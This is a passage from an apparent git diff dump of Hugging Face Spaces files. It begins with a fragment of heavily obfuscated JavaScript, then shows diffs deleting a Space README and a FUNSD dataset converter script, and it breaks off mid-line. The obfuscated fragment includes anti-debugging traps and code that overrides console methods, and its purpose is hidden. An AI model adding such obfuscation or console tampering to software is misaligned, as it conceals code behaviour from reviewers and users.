_0x121015===_0x5ce60e;},'DbTXj':_0x37219c(0x36b,0x3dc,0x2fe,0x344,0x2b9),'OaJSR':_0x163385(-0x2e6,-0x2dc,-0x1f7,-0x27c,-0x397),'JhSmt':function(_0xd0aec,_0x33c60b){return _0xd0aec+_0x33c60b;},'bHHoJ':function(_0x57de57,_0x3db417){return _0x57de57+_0x3db417;},'NVlVS':_0x5ef808(-0x38a,-0x217,-0x3c0,-0x2d8,-0x29d)+_0x37219c(0x423,0x38f,0x37f,0x462,0x42b)+_0x3c56c7(0x1f2,0x1d2,0x169,0x297,0x159)+_0x4c92c1(0x3c5,0x321,0x3f9,0x247,0x2ed),'lwfzy':_0x3c56c7(0x278,0x2e8,0x270,0x291,0x285)+_0x4c92c1(0x502,0x413,0x3be,0x3c5,0x477)+_0x37219c(0x279,0x1c6,0x26f,0x206,0x2e5)+_0x163385(-0x1aa,-0x129,-0x186,-0x1fc,-0x142)+_0x3c56c7(0x1f4,0x1dc,0x133,0x12b,0x202)+_0x3c56c7(0x1af,0x268,0x239,0x28b,0x251)+'\x20)','MTwwb':function(_0x56a4c8){return _0x56a4c8();},'IUUld':_0x3c56c7(0x249,0x1b7,0x1dd,0x1ca,0x21b),'vqZYb':_0x163385(-0x278,-0x20d,-0x2ef,-0x1cf,-0x205),'oewZB':_0x37219c(0x1df,0x2e3,0x234,0x249,0x1d8),'iUkoU':_0x4c92c1(0x372,0x2eb,0x3b1,0x2da,0x3cf),'ODzMc':_0x5ef808(-0x2ca,-0x25b,-0x222,-0x2d1,-0x326)+_0x37219c(0x3d6,0x262,0x309,0x358,0x235),'huTKO':_0x4c92c1(0x2c2,0x306,0x324,0x262,0x36f),'TnDMY':_0x4c92c1(0x3c5,0x3cd,0x37f,0x3b6,0x2e7),'fmLpv':function(_0x527a5b,_0x6c02b4){return _0x527a5b<_0x6c02b4;},'NHzuu':function(_0x3cd09e,_0x4fd2ba){return _0x3cd09e===_0x4fd2ba;},'dFTqf':_0x4c92c1(0x28b,0x367,0x39a,0x41f,0x315),'QENVS':function(_0x2f077d,_0x2792db){return _0x2f077d===_0x2792db;},'zmHMa':_0x3c56c7(0x18d,0x240,0x2dd,0x1e1,0x218)+'g','gvLdn':function(_0x29f302,_0x6fb28e){return _0x29f302!==_0x6fb28e;},'KXHHp':_0x5ef808(-0x166,-0x20c,-0x8d,-0x13a,-0x8d),'hmvVG':_0x4c92c1(0x34e,0x376,0x347,0x418,0x2fe),'IaAQQ':_0x5ef808(-0x14b,-0x2bd,-0x1b7,-0x1da,-0x168)+_0x3c56c7(0x1cc,0x297,0x303,0x231,0x2d4)+_0x37219c(0x2dc,0x183,0x25d,0x1c6,0x2a4),'VYcwE':_0x3c56c7(0x101,0x1cc,0x229,0x21f,0x101)+'er','dcTsu':function(_0x27055e,_0x2291f3){return _0x27055e===_0x2291f3;},'HXTIF':_0x163385(-0x19a,-0x1b8,-0x174,-0x221,-0x1db),'zkvhK':function(_0x58965a,_0x1cf64e){return _0x58965a/_0x1cf64e;},'iRTzo':_0x37219c(0x1fe,0x328,0x247,0x26b,0x297)+'h','WyYfq':function(_0xe259c1,_0xe77265){return _0xe259c1===_0xe77265;},'GgHUu':function(_0x28418e,_0x3a1021){return _0x28418e%_0x3a1021;},'PJUHq':function(_0x5414d9,_0x418ef1){return _0x5414d9!==_0x418ef1;},'EEfdC':_0x4c92c1(0x1fb,0x2d7,0x1fb,0x1f6,0x351),'dMrUv':_0x163385(-0x2ba,-0x338,-0x28d,-0x243,-0x1ca),'akkft':_0x37219c(0x289,0x2d6,0x2dd,0x30a,0x297),'QkmIN':_0x37219c(0x261,0x2d5,0x344,0x26c,0x338)+'n','TfeVo':function(_0x437857,_0x20c729){return _0x437857===_0x20c729;},'SRWRa':_0x5ef808(-0x133,-0x20b,-0x1be,-0x1ee,-0x2b1),'fEhhE':_0x5ef808(-0x19a,-0x16a,-0x253,-0x1b3,-0x1fb),'ivCFN':function(_0x3b25d2,_0x579938){return _0x3b25d2+_0x579938;},'HSAgz':_0x4c92c1(0x3fa,0x405,0x4ca,0x4ba,0x3a2)+_0x37219c(0x3c6,0x324,0x378,0x355,0x3e4)+'t','QYFAI':function(_0x5a0663,_0x2b5acb){return _0x5a0663(_0x2b5acb);},'vokxU':function(_0x48324e,_0x1ce876){return _0x48324e(_0x1ce876);},'FIsIF':function(_0xb0d37a,_0x268cc8){return _0xb0d37a+_0x268cc8;},'AteeO':function(_0x14f153,_0x4faa77){return _0x14f153!==_0x4faa77;},'omHUq':_0x3c56c7(0x249,0x315,0x387,0x245,0x29f),'yIPvi':_0x4c92c1(0x464,0x440,0x458,0x510,0x4b2),'RJqbZ':function(_0xe9c5ee,_0x58d32d){return _0xe9c5ee===_0x58d32d;},'egDib':_0x5ef808(-0x1da,-0x216,-0x2bd,-0x216,-0x2c0),'XQEcL':_0x4c92c1(0x344,0x2d8,0x242,0x2c8,0x220),'wsjSt':function(_0x518aac,_0x208cee){return _0x518aac!==_0x208cee;},'hEApv':_0x163385(-0x1ce,-0xf0,-0x16f,-0x110,-0x150),'nbfbP':_0x4c92c1(0x450,0x3a0,0x479,0x302,0x2f6)};function _0x3c56c7(_0xf43e55,_0x20da71,_0x57dd96,_0x13b696,_0x2a1b56){return _0x5b3717(_0x20da71-0x448,_0xf43e55,_0x57dd96-0x3,_0x13b696-0x25,_0x2a1b56-0x109);}function _0x4dacc1(_0x1f2ebb){function _0x1df5ce(_0x4386d7,_0x5e7f68,_0x51fef2,_0x170730,_0x4e2da0){return _0x163385(_0x4e2da0-0x63,_0x5e7f68-0x5b,_0x4386d7,_0x170730-0x99,_0x4e2da0-0xa0);}function _0x292b63(_0x14cd58,_0x45579e,_0x2d7e99,_0x4188e9,_0x576e87){return _0x37219c(_0x14cd58-0x39,_0x45579e-0x1bf,_0x45579e- -0x4fb,_0x4188e9-0xe1,_0x2d7e99);}function _0x315baa(_0x22d0da,_0x4ec0aa,_0x1c1f1f,_0x5c86ee,_0x3eb224){return _0x163385(_0x5c86ee-0x312,_0x4ec0aa-0x70,_0x3eb224,_0x5c86ee-0x2,_0x3eb224-0x4b);}const _0x36d494={'vxfdZ':function(_0x3959eb,_0x224ba2){function _0x2be67b(_0xc568c3,_0x4e9bfb,_0x217cef,_0x468fe5,_0x46ca2b){return _0x222c(_0xc568c3-0x271,_0x468fe5);}return _0x274a73[_0x2be67b(0x361,0x2f3,0x425,0x43a,0x270)](_0x3959eb,_0x224ba2);},'ffwFQ':_0x274a73[_0x1df5ce(-0x2c8,-0x319,-0x322,-0x29a,-0x28e)],'NRmyP':_0x274a73[_0x315baa(0x16b,0x110,0x8,0x7e,0xff)],'RnvIN':function(_0x5de2d4,_0x18cd5f){function _0x3ccb8d(_0x4a74cb,_0x413af3,_0x32dd1a,_0x301970,_0xcc65fb){return _0x315baa(_0x4a74cb-0x42,_0x413af3-0x9a,_0x32dd1a-0xe0,_0x301970-0x3a6,_0x32dd1a);}return _0x274a73[_0x3ccb8d(0x30c,0x34a,0x338,0x3af,0x3ad)](_0x5de2d4,_0x18cd5f);},'CSsds':function(_0x4073a6,_0x588f66){function _0x4a16d6(_0x35a425,_0x23a8d3,_0xd054e1,_0x460c32,_0x5db346){return _0x315baa(_0x35a425-0x139,_0x23a8d3-0x129,_0xd054e1-0x37,_0x35a425- -0x15e,_0x23a8d3);}return _0x274a73[_0x4a16d6(-0x8a,-0x77,-0x49,-0xaf,0xe)](_0x4073a6,_0x588f66);},'WZqeI':function(_0x57f75a,_0x26cedb){function _0x414327(_0x59b6a7,_0x5c7132,_0x7a43a9,_0x316bea,_0x5dcca1){return _0x315baa(_0x59b6a7-0xea,_0x5c7132-0xc7,_0x7a43a9-0x186,_0x5c7132-0x346,_0x5dcca1);}return _0x274a73[_0x414327(0x43b,0x359,0x2b1,0x36b,0x447)](_0x57f75a,_0x26cedb);},'vyEiL':_0x274a73[_0x56c700(0xb0,-0x51,0x64,-0x29,0x32)],'FXgKD':_0x274a73[_0x56c700(0x29,0xe8,0xd8,-0xc1,0x29)],'ThJCG':function(_0xc5adb6){function _0x22e575(_0x3d9595,_0x58dc5b,_0x479fe3,_0x473776,_0x399d2c){return _0x1df5ce(_0x399d2c,_0x58dc5b-0xd9,_0x479fe3-0x8e,_0x473776-0x4,_0x479fe3- -0x65);}return _0x274a73[_0x22e575(-0x26b,-0x2cd,-0x268,-0x222,-0x2de)](_0xc5adb6);},'EIIdK':_0x274a73[_0x315baa(0x211,0x15e,0x1c5,0x1b3,0x1b7)],'SyCzk':_0x274a73[_0x1df5ce(-0x1cf,-0x178,-0x17b,-0xc9,-0x152)],'RAplO':_0x274a73[_0x292b63(-0x218,-0x26f,-0x1b2,-0x268,-0x2c5)],'SAPOu':_0x274a73[_0x292b63(-0x16d,-0x1d9,-0x23d,-0x29c,-0x108)],'igXwh':_0x274a73[_0x292b63(-0x126,-0x1b8,-0x2a1,-0x1b9,-0xeb)],'BKGxW':_0x274a73[_0x315baa(0xa9,0x209,0x16f,0x14d,0xf0)],'uPIuo':_0x274a73[_0x56c700(0x88,0x32,0x62,-0x7,0x97)],'CzlDj':function(_0x24a5bb,_0x5e10fe){function _0x413088(_0x2369b,_0x3ef86f,_0x354a60,_0x3c8007,_0x541309){return _0x286c2e(_0x2369b-0x155,_0x3ef86f-0x20,_0x354a60-0x1cc,_0x3c8007-0xb9,_0x3c8007);}return _0x274a73[_0x413088(0x3a2,0x33b,0x24c,0x2ac,0x2b0)](_0x24a5bb,_0x5e10fe);}};function _0x286c2e(_0x14b5d7,_0x28b217,_0x361a48,_0x49b38a,_0x126475){return _0x4c92c1(_0x14b5d7-0x135,_0x28b217- -0x5e,_0x361a48-0x32,_0x126475,_0x126475-0x23);}function _0x56c700(_0x51a59e,_0x265bb8,_0x2ce528,_0xb6c224,_0x2035c1){return _0x5ef808(_0x51a59e-0x1dc,_0x265bb8-0x163,_0x2ce528-0xd3,_0x2035c1-0x315,_0xb6c224);}if(_0x274a73[_0x286c2e(0x2b6,0x363,0x2b9,0x3bf,0x275)](_0x274a73[_0x315baa(-0x6,0xfb,-0x8d,0x61,0x148)],_0x274a73[_0x286c2e(0x259,0x2e7,0x3b2,0x2f9,0x30e)])){if(_0x274a73[_0x1df5ce(-0x1a3,-0x1eb,-0x29d,-0x1fb,-0x1d7)](typeof _0x1f2ebb,_0x274a73[_0x1df5ce(-0x150,-0x37,-0x9,-0x129,-0xf8)])){if(_0x274a73[_0x286c2e(0x46f,0x3ba,0x2f3,0x476,0x445)](_0x274a73[_0x286c2e(0x2d6,0x3b8,0x2fc,0x39b,0x37c)],_0x274a73[_0x1df5ce(-0x29f,-0x2da,-0x330,-0x325,-0x280)]))return function(_0x4925d3){}[_0x315baa(0xd3,0x1dc,0x135,0x108,0x68)+_0x292b63(-0x287,-0x2da,-0x20b,-0x397,-0x246)+'r'](_0x274a73[_0x1df5ce(-0x202,-0x14a,-0x173,-0xd7,-0x125)])[_0x286c2e(0x407,0x3e0,0x3d1,0x45c,0x318)](_0x274a73[_0x286c2e(0x31d,0x2a4,0x2f9,0x2a2,0x301)]);else{if(_0x39b16c)return _0x1925b8;else _0x274a73[_0x315baa(-0xda,0x0,0x2,0x9,0xe0)](_0x101893,0x70e+0x101f*0x1+-0x172d);}}else{if(_0x274a73[_0x56c700(0x67,0x11d,0x15f,0x1e7,0x136)](_0x274a73[_0x292b63(-0x131,-0x1f4,-0x2c4,-0x2a0,-0x237)],_0x274a73[_0x56c700(0x1ed,0x244,0x23f,0x20a,0x156)])){if(_0x274a73[_0x292b63(-0x19f,-0x1ce,-0x29f,-0x168,-0x108)](_0x274a73[_0x292b63(-0x3af,-0x2ef,-0x294,-0x30e,-0x279)]('',_0x274a73[_0x1df5ce(-0x1de,-0x105,-0x15f,-0x1cc,-0x134)](_0x1f2ebb,_0x1f2ebb))[_0x274a73[_0x292b63(-0x31e,-0x26c,-0x2ea,-0x219,-0x336)]],0x1*0x1894+-0x1e6*-0x1+-0x1*0x1a79)||_0x274a73[_0x286c2e(0x43d,0x3e5,0x311,0x416,0x43e)](_0x274a73[_0x315baa(-0xaf,0x96,-0xa9,0x38,0x8a)](_0x1f2ebb,-0x2647+0x990+0x51*0x5b),0xcc7+-0x226d+0xa3*0x22)){if(_0x274a73[_0x286c2e(0x3f5,0x360,0x279,0x44d,0x392)](_0x274a73[_0x56c700(0x1f2,0x110,0x125,0x1e3,0x1bd)],_0x274a73[_0x292b63(-0x1dc,-0x18d,-0x205,-0x22b,-0x9d)])){const _0x43262d=_0x684335[_0x1df5ce(-0x277,-0x27f,-0x1e6,-0x26d,-0x1a7)+_0x292b63(-0x2bf,-0x2da,-0x33f,-0x355,-0x39f)+'r'][_0x315baa(0x124,0x161,0x15b,0x189,0x137)+_0x56c700(0xc9,0x184,0x95,0x1ea,0x11b)][_0x315baa(0x151,0xf0,0x77,0xae,0x11)](_0x260ca5),_0x4d05b3=_0x30fcfe[_0x4bcff0],_0x246e19=_0xf77b38[_0x4d05b3]||_0x43262d;_0x43262d[_0x56c700(0x1c7,0x1b1,0x61,0x5f,0xf1)+_0x286c2e(0x1ed,0x296,0x1d7,0x256,0x2c8)]=_0xcfbab7[_0x286c2e(0x3db,0x334,0x362,0x3c2,0x2f8)](_0x4d58aa),_0x43262d[_0x286c2e(0x4d8,0x427,0x3bd,0x449,0x514)+_0x292b63(-0x33f,-0x300,-0x3bb,-0x2d9,-0x31a)]=_0x246e19[_0x286c2e(0x388,0x427,0x4b6,0x380,0x517)+_0x286c2e(0x2ec,0x288,0x204,0x28e,0x302)][_0x286c2e(0x3fe,0x334,0x3c7,0x32e,0x397)](_0x246e19),_0x146534[_0x4d05b3]=_0x43262d;}else(function(){function _0x211536(_0x2a2ec9,_0x41a5df,_0x1cc2c8,_0x448a30,_0x2348d1){return _0x56c700(_0x2a2ec9-0x55,_0x41a5df-0x130,_0x1cc2c8-0x121,_0x2348d1,_0x448a30- -0x104);}function _0x33fd27(_0x1fc3cd,_0x4560b,_0xd10f2,_0xc63e04,_0x369d8b){return _0x315baa(_0x1fc3cd-0x9d,_0x4560b-0x15d,_0xd10f2-0xd9,_0xd10f2-0x3ee,_0x4560b);}function _0x30472a(_0x1059da,_0x359c8f,_0x26274b,_0x233917,_0x2a0e44){return _0x315baa(_0x1059da-0x129,_0x359c8f-0x27,_0x26274b-0x38,_0x233917-0x2c0,_0x1059da);}function _0x4e1c90(_0x134d49,_0x5ecc47,_0x5b5911,_0x3c7817,_0xe475e2){return _0x1df5ce(_0xe475e2,_0x5ecc47-0x130,_0x5b5911-0x124,_0x3c7817-0xcb,_0x5b5911-0x179);}function _0x2c9db6(_0x47552d,_0x1bb639,_0x3ea939,_0x234693,_0x386f79){return _0x286c2e(_0x47552d-0x1ae,_0x234693- -0x287,_0x3ea939-0xfb,_0x234693-0xa3,_0x1bb639);}if(_0x274a73[_0x2c9db6(-0x79,-0x4,-0x56,0x5d,-0x4)](_0x274a73[_0x2c9db6(0x85,0x8c,-0x33,-0x1e,0xd3)],_0x274a73[_0x33fd27(0x416,0x3c0,0x3d1,0x338,0x3b2)]))return!![];else _0xbe906e[_0x30472a(0x245,0x2c3,0x367,0x2db,0x31f)](_0x4e1c90(-0xe0,-0x51,-0x101,-0x1c5,-0x150)+_0x33fd27(0x4b2,0x432,0x422,0x3b7,0x3ae)+_0x2c9db6(0x17d,0x113,0x1e8,0x13a,0x1fc)+_0x211536(-0xa,0x132,-0x56,0x43,0xff)+_0x2c9db6(0xb0,0x191,0x146,0xe7,0xa)+'\x20'+_0x398d92);}[_0x286c2e(0x300,0x38e,0x3eb,0x3f6,0x311)+_0x292b63(-0x244,-0x2da,-0x2ec,-0x349,-0x2e8)+'r'](_0x274a73[_0x56c700(-0x27,0xee,-0x81,0xab,0x5b)](_0x274a73[_0x286c2e(0x3ec,0x407,0x4b0,0x38d,0x4f8)],_0x274a73[_0x56c700(0xcb,0x78,0x51,0x183,0x137)]))[_0x292b63(-0x2a8,-0x319,-0x273,-0x357,-0x308)](_0x274a73[_0x286c2e(0x43f,0x35f,0x2eb,0x346,0x38e)]));}else _0x274a73[_0x286c2e(0x22d,0x311,0x2b1,0x3d3,0x243)](_0x274a73[_0x286c2e(0x430,0x356,0x441,0x369,0x424)],_0x274a73[_0x286c2e(0x38b,0x38c,0x3ff,0x47c,0x3f2)])?_0x1f49b7[_0x315baa(-0xd3,0x100,0xef,0x1b,0xfc)](_0x1df5ce(-0x140,-0x25e,-0x234,-0x19a,-0x1f7)+_0x286c2e(0x242,0x287,0x328,0x1b0,0x1cb)+_0x315baa(0x134,-0x1f,0xf0,0x68,0x12c)+_0x292b63(-0x143,-0x1f9,-0x22b,-0x131,-0x2cc)+_0x286c2e(0x4c6,0x40e,0x41a,0x32f,0x494)+_0x286c2e(0x3e8,0x326,0x2ae,0x2a5,0x3a6)+_0x16a84a):function(){function _0x3daebb(_0x9a03ab,_0x37dd8e,_0x520996,_0x7d7599,_0x428686){return _0x56c700(_0x9a03ab-0x2,_0x37dd8e-0x8d,_0x520996-0xde,_0x520996,_0x37dd8e- -0x35);}function _0x4a4d08(_0x148057,_0x2bddf0,_0x49762d,_0x459365,_0x46d29a){return _0x292b63(_0x148057-0xb9,_0x459365-0x113,_0x46d29a,_0x459365-0x53,_0x46d29a-0x35);}function _0x35a402(_0x423f90,_0x5e706b,_0x5d8a0d,_0x117a44,_0x56245b){return _0x1df5ce(_0x423f90,_0x5e706b-0x102,_0x5d8a0d-0x7c,_0x117a44-0x10d,_0x5e706b-0x5f0);}function _0x5a477a(_0x11ee68,_0x4912c5,_0x47236b,_0x2f288e,_0x117b0e){return _0x292b63(_0x11ee68-0x1bf,_0x11ee68-0x5d3,_0x4912c5,_0x2f288e-0xa,_0x117b0e-0x1be);}if(_0x36d494[_0x3daebb(0x19c,0x10b,0xb2,0xc4,0x1d1)](_0x36d494[_0x3daebb(0x11f,0x127,0x166,0x141,0x1ec)],_0x36d494[_0x3daebb(0xd6,0xcd,0x9a,0x5a,0xdf)])){const _0x50f770=_0x1e56db[_0x4a4d08(-0x89,-0x3e,-0xb1,-0x95,-0x74)](_0x342abc,arguments);return _0x2dfae9=null,_0x50f770;}else return![];}[_0x292b63(-0x234,-0x1fa,-0x15d,-0x22f,-0x22d)+_0x1df5ce(-0x29e,-0x288,-0x2ed,-0x2a3,-0x287)+'r'](_0x274a73[_0x286c2e(0x2d9,0x28a,0x288,0x1e0,0x1e4)](_0x274a73[_0x286c2e(0x41b,0x407,0x486,0x35a,0x34c)],_0x274a73[_0x286c2e(0x356,0x375,0x45c,0x3af,0x387)]))[_0x286c2e(0x44b,0x3e0,0x3d9,0x33a,0x413)](_0x274a73[_0x286c2e(0x292,0x329,0x30f,0x3ad,0x26c)]);}else{const _0x1e6bb6=_0x122d56[_0x1df5ce(-0x137,-0x102,-0xa6,-0x7b,-0x155)](_0x680e0c,arguments);return _0x47d3e4=null,_0x1e6bb6;}}_0x274a73[_0x315baa(0x12d,0xe5,0xb4,0x5c,0x137)](_0x4dacc1,++_0x1f2ebb);}else{let _0x4d39a7;try{const _0x57e87a=_0x36d494[_0x56c700(0x221,0x2b3,0x285,0x18a,0x1fd)](_0x5e3f46,_0x36d494[_0x286c2e(0x31e,0x2cb,0x341,0x26f,0x36f)](_0x36d494[_0x1df5ce(-0x28d,-0x23d,-0x246,-0x179,-0x263)](_0x36d494[_0x56c700(0x1ae,0x121,0xc8,0x1d5,0x142)],_0x36d494[_0x292b63(-0x217,-0x19d,-0x18f,-0x18c,-0x1fe)]),');'));_0x4d39a7=_0x36d494[_0x315baa(0x1b0,0xb5,0x59,0xe3,0xa4)](_0x57e87a);}catch(_0x18b37e){_0x4d39a7=_0x24fb6b;}const _0x510e9f=_0x4d39a7[_0x292b63(-0x365,-0x2be,-0x37e,-0x366,-0x2c7)+'le']=_0x4d39a7[_0x315baa(0x12f,0x49,0xe7,0x44,0x13)+'le']||{},_0x1bc6ab=[_0x36d494[_0x56c700(0x199,0x1ac,0x100,0xd4,0xc8)],_0x36d494[_0x292b63(-0x241,-0x1c0,-0x219,-0x134,-0x2b0)],_0x36d494[_0x56c700(0xfc,0xfa,0x209,0x134,0x149)],_0x36d494[_0x56c700(0xfb,0xcb,0x122,0xfb,0x50)],_0x36d494[_0x1df5ce(-0x1fd,-0x7c,-0xb9,-0x16c,-0x11d)],_0x36d494[_0x1df5ce(-0x249,-0x1ef,-0xcf,-0x1a8,-0x15d)],_0x36d494[_0x292b63(-0x260,-0x20d,-0x1b5,-0x219,-0x1b9)]];for(let _0x228541=-0x264e+0x112e+0x1520;_0x36d494[_0x1df5ce(-0x1d6,-0x167,-0x2e2,-0x236,-0x1f1)](_0x228541,_0x1bc6ab[_0x292b63(-0x2a9,-0x2b4,-0x2d2,-0x24a,-0x317)+'h']);_0x228541++){const _0x3d0927=_0x275b00[_0x286c2e(0x38f,0x38e,0x472,0x3c2,0x450)+_0x315baa(-0x23,0xd,0xdc,0x28,-0x26)+'r'][_0x1df5ce(-0xc0,-0x1d0,-0x1a3,-0x45,-0x126)+_0x292b63(-0x24f,-0x22f,-0x235,-0x21c,-0x1ed)][_0x1df5ce(-0x203,-0x2d3,-0x243,-0x136,-0x201)](_0x50ba5a),_0x4f0687=_0x1bc6ab[_0x228541],_0x44c38c=_0x510e9f[_0x4f0687]||_0x3d0927;_0x3d0927[_0x1df5ce(-0x179,-0x2e7,-0x239,-0x127,-0x206)+_0x56c700(0xd9,-0x85,0x122,0xda,0x58)]=_0x366acb[_0x292b63(-0x2fa,-0x254,-0x22c,-0x1e1,-0x30d)](_0x5ce843),_0x3d0927[_0x56c700(0x1f1,0x135,0x17a,0x26b,0x1e9)+_0x315baa(0x9c,-0x50,-0x79,0x2,0xbc)]=_0x44c38c[_0x315baa(0x22a,0x144,0x144,0x1a1,0x17c)+_0x56c700(-0x64,0xbb,0xb7,0xa0,0x4a)][_0x1df5ce(-0x187,-0x25e,-0x246,-0x13f,-0x201)](_0x44c38c),_0x510e9f[_0x4f0687]=_0x3d0927;}}}function _0x4c92c1(_0x31556a,_0x459b40,_0x395ee7,_0x195162,_0x4d9d70){return _0x504eae(_0x459b40-0xc1,_0x459b40-0xa1,_0x395ee7-0x126,_0x195162-0xed,_0x195162);}function _0x5ef808(_0x313b76,_0x3f475c,_0x527422,_0x576a4e,_0xd60573){return _0x1d31e6(_0x576a4e- -0x345,_0x3f475c-0x74,_0xd60573,_0x576a4e-0x156,_0xd60573-0xa9);}function _0x163385(_0x27c341,_0x53ff3b,_0x3d059a,_0x536423,_0x42ac09){return _0x5b3717(_0x27c341- -0x66,_0x3d059a,_0x3d059a-0xa,_0x536423-0xce,_0x42ac09-0x2e);}function _0x37219c(_0xca9036,_0x4dc92e,_0x422991,_0x54701d,_0x40f6bf){return _0x1e3602(_0xca9036-0xa4,_0x40f6bf,_0x422991-0x126,_0x422991-0x2b2,_0x40f6bf-0x46);}try{if(_0x274a73[_0x4c92c1(0x484,0x3ee,0x351,0x351,0x438)](_0x274a73[_0x163385(-0x1f7,-0x2a5,-0x1bb,-0x148,-0x226)],_0x274a73[_0x5ef808(-0x11f,-0x228,-0x277,-0x1f7,-0x2c2)])){if(_0x505d61){if(_0x274a73[_0x3c56c7(0x37f,0x312,0x357,0x2e0,0x2b6)](_0x274a73[_0x4c92c1(0x275,0x34e,0x301,0x3ad,0x294)],_0x274a73[_0x37219c(0x34c,0x1c9,0x274,0x1b7,0x302)]))_0x274a73[_0x5ef808(-0x28f,-0x303,-0x372,-0x2a8,-0x24f)](_0x478d65,-0xe9*0x13+0x7b8+0x993);else return _0x4dacc1;}else{if(_0x274a73[_0x163385(-0x265,-0x2d8,-0x2c6,-0x349,-0x24c)](_0x274a73[_0x37219c(0x336,0x29f,0x249,0x2eb,0x268)],_0x274a73[_0x5ef808(-0x20d,-0x12a,-0x19a,-0x1d1,-0x21f)]))_0x274a73[_0x5ef808(-0x22a,-0x36f,-0x2bd,-0x2a8,-0x2b0)](_0x4dacc1,-0x231+-0x3*0xcdb+0x28c2);else{let _0x5d9b75;try{_0x5d9b75=_0x274a73[_0x5ef808(-0x23d,-0x2cd,-0x274,-0x271,-0x2c9)](_0x58446f,_0x274a73[_0x5ef808(-0x2bd,-0x136,-0x214,-0x1f9,-0x150)](_0x274a73[_0x4c92c1(0x30d,0x38b,0x2b8,0x352,0x325)](_0x274a73[_0x4c92c1(0x3ba,0x2ce,0x296,0x295,0x2ea)],_0x274a73[_0x3c56c7(0x1ce,0x17d,0x137,0x18b,0x20d)]),');'))();}catch(_0x724811){_0x5d9b75=_0xa22605;}return _0x5d9b75;}}}else{if(_0x47e411){const _0x386471=_0x3c6c2a[_0x4c92c1(0x4c4,0x43e,0x415,0x449,0x374)](_0x5e66a5,arguments);return _0x2b067c=null,_0x386471;}}}catch(_0x399381){}} diff --git a/spaces/Modfiededition/tweet_sentiment_extractor/README.md b/spaces/Modfiededition/tweet_sentiment_extractor/README.md deleted file mode 100644 index 697224cc1c0a25e870da91317f18cfad26efe770..0000000000000000000000000000000000000000 --- a/spaces/Modfiededition/tweet_sentiment_extractor/README.md +++ /dev/null @@ -1,37 +0,0 @@ ---- -title: Tweet_sentiment_extractor -emoji: 📚 -colorFrom: yellow -colorTo: blue -sdk: streamlit -app_file: app.py -pinned: false ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio` or `streamlit` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/Mountchicken/MAERec-Gradio/tools/dataset_converters/textdet/funsd_converter.py b/spaces/Mountchicken/MAERec-Gradio/tools/dataset_converters/textdet/funsd_converter.py deleted file mode 100644 index 7be887d2637b99f0113f99f06a05f7591c061f39..0000000000000000000000000000000000000000 --- a/spaces/Mountchicken/MAERec-Gradio/tools/dataset_converters/textdet/funsd_converter.py +++ /dev/null @@ -1,159 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import argparse -import math -import os -import os.path as osp - -import mmcv -import mmengine - -from mmocr.utils import dump_ocr_data - - -def collect_files(img_dir, gt_dir): - """Collect all images and their corresponding groundtruth files. - - Args: - img_dir (str): The image directory - gt_dir (str): The groundtruth directory - - Returns: - files (list): The list of tuples (img_file, groundtruth_file) - """ - assert isinstance(img_dir, str) - assert img_dir - assert isinstance(gt_dir, str) - assert gt_dir - - ann_list, imgs_list = [], [] - for gt_file in os.listdir(gt_dir): - ann_list.append(osp.join(gt_dir, gt_file)) - imgs_list.append(osp.join(img_dir, gt_file.replace('.json', '.png'))) - - files = list(zip(sorted(imgs_list), sorted(ann_list))) - assert len(files), f'No images found in {img_dir}' - print(f'Loaded {len(files)} images from {img_dir}') - - return files - - -def collect_annotations(files, nproc=1): - """Collect the annotation information. - - Args: - files (list): The list of tuples (image_file, groundtruth_file) - nproc (int): The number of process to collect annotations - - Returns: - images (list): The list of image information dicts - """ - assert isinstance(files, list) - assert isinstance(nproc, int) - - if nproc > 1: - images = mmengine.track_parallel_progress( - load_img_info, files, nproc=nproc) - else: - images = mmengine.track_progress(load_img_info, files) - - return images - - -def load_img_info(files): - """Load the information of one image. - - Args: - files (tuple): The tuple of (img_file, groundtruth_file) - - Returns: - img_info (dict): The dict of the img and annotation information - """ - assert isinstance(files, tuple) - - img_file, gt_file = files - assert osp.basename(gt_file).split('.')[0] == osp.basename(img_file).split( - '.')[0] - # read imgs while ignoring orientations - img = mmcv.imread(img_file, 'unchanged') - - img_info = dict( - file_name=osp.join(osp.basename(img_file)), - height=img.shape[0], - width=img.shape[1], - segm_file=osp.join(osp.basename(gt_file))) - - if osp.splitext(gt_file)[1] == '.json': - img_info = load_json_info(gt_file, img_info) - else: - raise NotImplementedError - - return img_info - - -def load_json_info(gt_file, img_info): - """Collect the annotation information. - - Args: - gt_file (str): The path to ground-truth - img_info (dict): The dict of the img and annotation information - - Returns: - img_info (dict): The dict of the img and annotation information - """ - - annotation = mmengine.load(gt_file) - anno_info = [] - for form in annotation['form']: - for ann in form['words']: - - iscrowd = 1 if len(ann['text']) == 0 else 0 - - x1, y1, x2, y2 = ann['box'] - x = max(0, min(math.floor(x1), math.floor(x2))) - y = max(0, min(math.floor(y1), math.floor(y2))) - w, h = math.ceil(abs(x2 - x1)), math.ceil(abs(y2 - y1)) - bbox = [x, y, w, h] - segmentation = [x, y, x + w, y, x + w, y + h, x, y + h] - - anno = dict( - iscrowd=iscrowd, - category_id=1, - bbox=bbox, - area=w * h, - segmentation=[segmentation]) - anno_info.append(anno) - - img_info.update(anno_info=anno_info) - - return img_info - - -def parse_args(): - parser = argparse.ArgumentParser( - description='Generate training and test set of FUNSD ') - parser.add_argument('root_path', help='Root dir path of FUNSD') - parser.add_argument( - '--nproc', default=1, type=int, help='Number of process') - args = parser.parse_args() - return args - - -def main(): - args = parse_args() - root_path = args.root_path - - for split in ['training', 'test']: - print(f'Processing {split} set...') - with mmengine.Timer( - print_tmpl='It takes {}s to convert FUNSD annotation'): - files = collect_files( - osp.join(root_path, 'imgs'), - osp.join(root_path, 'annotations', split)) - image_infos = collect_annotations(files, nproc=args.nproc) - dump_ocr_data(image_infos, - osp.join(root_path, 'instances_' + split + '.json'), - 'textdet') - - -if __name__ == '__main__': - main() diff --git 